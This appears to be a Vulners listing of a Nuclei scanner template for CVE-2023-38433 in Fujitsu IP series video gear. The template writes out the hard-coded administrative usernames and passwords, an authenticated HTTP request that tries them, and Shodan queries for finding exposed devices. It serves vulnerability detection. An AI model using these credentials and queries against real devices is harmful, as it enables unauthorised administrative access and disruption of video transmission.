Lucene search
K

Fujitsu IP Series - Hardcoded Credentials

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 32 Views

Fujitsu IP Series - Hardcoded Credentials allowing remote attacker to terminate video transmission. Unauthorized access. CVE-2023-3843

Related
Refs
Code
id: CVE-2023-38433

info:
  name: Fujitsu IP Series - Hardcoded Credentials
  author: AdnaneKhan
  severity: high
  description: |
    Fujitsu Real-time Video Transmission Gear “IP series” use hard-coded credentials, which may allow a remote unauthenticated attacker to initialize or reboot the products, and as a result, terminate the video transmission. The credentials cannot be changed by the end-user and provide administrative access to the devices.
  remediation: |
    Apply the latest security patches and updates from the vendor to address this vulnerability.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to the device, potentially resulting in further compromise of the network.
  reference:
    - https://www.praetorian.com/blog/fujitsu-ip-series-hard-coded-credentials
    - https://nvd.nist.gov/vuln/detail/CVE-2023-38433
    - https://www.cisa.gov/news-events/ics-advisories/icsa-23-248-01
    - https://www.fujitsu.com/global/products/computing/peripheral/video/download
    - https://jvn.jp/en/jp/JVN95727578
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
    cvss-score: 7.5
    cve-id: CVE-2023-38433
    cwe-id: CWE-798
    epss-score: 0.0299
    epss-percentile: 0.85654
    cpe: cpe:2.3:o:fujitsu:ip-he950e_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: fujitsu
    product: ip-he950e_firmware
    shodan-query:
      - '"Server: thttpd/2.25b 29dec2003" content-length:1133'
      - '"server: thttpd/2.25b 29dec2003" content-length:1133'
    max-req: 1
  tags: cve2023,cve,fujitsu,ip-series,vkev,vuln

http:
  - raw:
      - |
        GET /b_download/index.html HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}

    attack: pitchfork
    payloads:
      username:
        - fedish264pro
        - fedish265pro
      password:
        - h264pro@broadsight
        - h265pro@broadsight

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Field Support'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100afc665fa5c086f88ea7a8da4737285243861417631dd3c5e9ef3337a9f2b3ac5022065afd186da05f017f09baa174adf67936e70f09ca674fb632dc37b3b0c2deee7:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 3.17.5
EPSS0.0299
SSVC
32